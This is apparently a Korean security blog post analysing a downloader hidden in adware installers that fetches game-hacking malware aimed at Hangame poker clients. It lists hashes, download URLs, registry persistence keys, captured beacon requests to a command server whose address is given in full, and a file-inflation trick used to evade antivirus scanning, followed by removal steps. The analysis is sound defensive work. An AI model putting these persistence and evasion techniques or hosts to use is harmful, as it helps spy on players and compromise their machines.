본문 바로가기

벌새::Analysis

광고 프로그램 속에 숨어있는 온라인 게임 악성코드 유포 사례

728x90
반응형
작년 하반기부터 개인적으로 유포를 확인하여 최근까지 유사하게 유포가 이루어지고 있는 특정 온라인 게임을 노리는 악성코드 유포와 관련되어 살펴보도록 하겠습니다.

작년과 올해 초에 유포되던 방식은 국내 특정 공개 자료실에서 제공하는 광고 프로그램 내부에 은밀하게 추가되는 방식과 블로그 등을 통해 각종 게임, 소프트웨어 설치 파일 내부에 포함된 광고 프로그램 내부에 포함되어 유포가 이루어졌었습니다.

최근 7월경에도 특정 광고 프로그램을 설치할 경우 설치되는 과정에서 사용자가 인지하기 어려운 방식으로 설치가 진행되는 것을 계속적으로 확인할 수 있었습니다.

[mcmst_ma.exe 설치 파일 진단 정보]

1. MD5 : e2b4efb1f91651a04c0c2c24355244cb
- avast! : Win32:Downloader-IDO [Trj] (VirusTotal : 12/43)

2. MD5 : 36224114f3596498cb59301e6cd63a3b
- AhnLab V3 : Win-Trojan/Downloader.82944.AJ (VirusTotal : 23/43)

※ 2종의 변종을 확인하였으며, 테스트에서는 그 중 하나를 중심으로 일부 혼합된 형태로 작성되어 있습니다.

해당 설치 파일을 실행할 경우 국내 특정 서버 2곳에서 SysFont.exe, mcmst_ma.exe 2종의 파일을 다운로드하여 설치가 이루어집니다.
 
  • h**p://www.increasing**.kr/Module/SysFont.exe :: 광고 프로그램 드랍퍼(Dropper)
  • h**p://218.5*.4.*6*/data/mcmst_ma.exe :: 온라인 게임용 악성 파일 드랍퍼(Dropper)
  • h**p://www.increasing**.kr/Module/SysFont.exe
  • h**p://www.increasing**.kr/Module/count.html?exec=SysFont.exe&instFile=SysFont.exe
  • h**p://www.increasing**.kr/Module/count_live.html?exec=SysFont.exe
[생성 폴더 / 파일 등록 정보]

C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\mcmst_ma.exe
C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\SysFont.exe
C:\Program Files\SysFont
C:\Program Files\SysFont\SysFont.exe
C:\Program Files\mcmst
C:\Program Files\mcmst\mcmst_ma.exe

 

[생성 파일 진단 정보]

C:\Program Files\SysFont\SysFont.exe
 - MD5 : 7c03ca6694f31888c82a0d04babdca17
 - AhnLab V3 : Win-Downloader/Adload.102912 (VirusTotal : 23/43)

C:\Program Files\mcmst\mcmst_ma.exe
 - MD5 : 5a941b2a28f57154388999765c8f3eca
 - BitDefender : Gen:Variant.Downloader.92 (VirusTotal : 14/43)


설치된 파일 중 온라인 게임 악성 파일을 추가로 다운로드하는 기능을 가진 [C:\Program Files\mcmst\mcmst_ma.exe] 파일과 광고 프로그램 등을 설치할 목적인 [C:\Program Files\SysFont\SysFont.exe] 파일을 생성하는 것을 확인할 수 있습니다.

[생성 레지스트리 등록 정보]

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
 - SysFont = C:\Program Files\SysFont\SysFont.exe
HKEY_CURRENT_USER\Software\SysFont
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 - mcmst_ma.exe = C:\Program Files\mcmst\mcmst_ma.exe
HKEY_LOCAL_MACHINE\SOFTWARE\mcmst
HKEY_LOCAL_MACHINE\SOFTWARE\sink


설치된 mcmst_ma.exe 파일은 시작 프로그램으로 등록되어 시스템 재부팅시부터 메모리에 상주하도록 구성되어 있으며, 다음과 같은 외부 연결이 이루어지고 있습니다.

GET / HTTP/1.1
Host:
www.naver.com
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

GET /update/version.txt HTTP/1.1
Host: 218.5*.4.*6*
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

GET /install.asp?mac=(사용자 Mac Address)&mode=ma HTTP/1.1
Host: 218.5*.4.*6*
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

GET /boot.asp?mode=ma HTTP/1.1
Host: 218.5*.4.*6*
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


mcmst_ma.exe 파일은 네이버(Naver) 연결 체크를 통해 인터넷 연결 상태 확인, 특정 서버에 연결하여 업데이트 체크, 설치 PC 카운터 등을 체크하는 동작을 확인할 수 있습니다.

GET /dfile.txt HTTP/1.1
Host: 218.5*.4.*6*
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


이렇게 설치된 환경에서 mcmst_ma.exe 프로세스는 사용자가 웹 브라우저를 통해 dfile.txt 파일에 등록된 한게임 포커(poker.hangame.com) 페이지에 접속하는 조건이 발생할 경우, 다음과 같은 추가적인 다운로드를 통해 악성 파일을 추가로 설치하는 동작이 발생합니다.

1. "C:\Program Files\ascom.exe" 파일 생성 및 5642796 서비스 등록

 

 

 

mcmst_ma.exe 프로세스는 ascom.exe 파일을 생성하며, 추가적으로 5642796 서비스 항목을 등록하는 동작을 확인할 수 있습니다.

 

 

[5642796 서비스 등록 레지스트리 정보]

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_5642796
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\5642796
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_5642796
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\5642796


서비스에 등록된 5642796 항목은 svchost.exe 프로세스를 생성하여 시스템 시작시 자동 실행되어 메모리에 상주하도록 구성되어 있습니다.

2. "C:\WINDOWS\system32\5642796.dll" 파일 생성

 

 

서비스에 등록된 후 [C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\433218_res.tmp] 파일의 용량을 50MB 이상까지 증가시켜 최종적으로 [C:\WINDOWS\system32\5642796.dll] 파일을 생성합니다.

생성된 5642796.dll 파일은 숨김 속성 파일로 자신을 감추고 있으며, 용량을 50MB 이상으로 증가시켜 보안 제품의 실시간 감시를 우회하려는 것으로 추정됩니다.

[5642796.dll 파일 진단 정보]

C:\WINDOWS\system32\5642796.dll
 - MD5 : 7DADC122031A2A568A60BBAA6F577F50
 - Microsoft : Backdoor:Win32/PcClient.ZR (VirusTotal : 8/43)

C:\WINDOWS\system32\5642796.dll
 - MD5 : 10969330FC78A6B2382F91C2B79137AC
 - AhnLab V3 : Win-Trojan/Onlinegamehack.52932096 (VirusTotal : 9/42)


3. 5642796 서비스 분석

 

 

이렇게 감염된 환경에서 시스템 시작시 서비스에 등록된 svchost.exe 프로세스가 국내 아이피(IP) 180.228.128.213:2305(cool2305.gicp.net)로 연결을 시도하고 있으며, 시스템 폴더에 숨김 파일로 등록된 5642796.dll 파일이 핸들(Handle)되어 있는 것을 확인할 수 있습니다.

 

5642796.dll

 

50MB 이상의 용량을 가지고 있는 5642796.dll 파일은 메모리에 상주하면서 pmangagent.exe, poker7.exe, hoola3.exe, laspoker.exe, highlow2.exe, duelpoker.exe, baduki.exe 프로세스가 존재할 경우 돋보기 프로그램과 같이 상대의 화면을 볼 수 있을 것으로 추정됩니다.

 

 

해당 온라인 게임 악성코드 제거를 위해서는 실행창에 [sc stop "5642796"] 명령어를 이용하여 서비스를 중지하시기 바랍니다.

 

 

그 후 작업 관리자에서 mcmst_ma.exe 프로세스를 수동으로 종료한 후, 생성 파일 및 관련 레지스트리 항목을 수동으로 삭제하시기 바랍니다.

 

 

참고로 광고 프로그램 설치를 목적으로 한 SysFont.exe 파일의 경우, 시스템 시작시마다 시작 프로그램으로 등록하여 특정 업데이트 서버에 연결을 시도하고 있습니다.

 

특정 시점에서 해당 서버에 등록된 설치 파일을 사용자 동의 없이 다운로드하여 설치가 이루어지는 것을 확인할 수 있습니다.

위와 같이 일부 온라인 게임과 관련된 악성코드는 국내 광고 프로그램 설치 과정에서 사용자 몰래 설치되는 유포가 확인이 되고 있으므로 주의하시기 바랍니다.

728x90
반응형